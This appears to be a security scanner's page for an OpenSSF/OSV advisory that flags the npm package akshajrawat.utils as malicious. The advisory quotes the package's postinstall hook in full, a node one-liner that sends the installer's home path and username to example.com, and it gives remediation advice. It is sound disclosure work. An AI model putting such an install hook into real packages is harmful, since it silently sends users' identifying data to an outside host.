OSV Malicious Advisory
scanned 3h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10558 confirms this npm version as malicious. The package's package.json declares a postinstall lifecycle hook that runs automatically on `npm install`: `node -e "require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)"`. On every install, this issues an unconditional HTTPS GET to https://example.com/collect with the installer's $HOME path and $USERNAME embedded as query-string parameters...
Advisory
MAL-2026-10558
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in akshajrawat.utils (npm)
Details
The package's package.json declares a postinstall lifecycle hook that runs automatically on `npm install`: `node -e "require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)"`. On every install, this issues an unconditional HTTPS GET to https://example.com/collect with the installer's $HOME path and $USERNAME embedded as query-string parameters. This is the canonical supply-chain exfiltration shape: lifecycle-triggered, unconditional, undocumented outbound transmission of installer-side identifiers. While example.com and the package description suggest the package may be a proof-of-concept or research artifact, the structural behavior would harm any installer who runs `npm install` against it, and the same scaffold trivially redirects to an attacker-controlled host.
## Source: ghsa-malware (368b22696d6b2d76728b4593d3c97a3712df37b64722b96a37bf85f08e11b537) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms akshajrawat.utils@1.0.1 as malicious (MAL-2026-10558): Malicious code in akshajrawat.utils (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory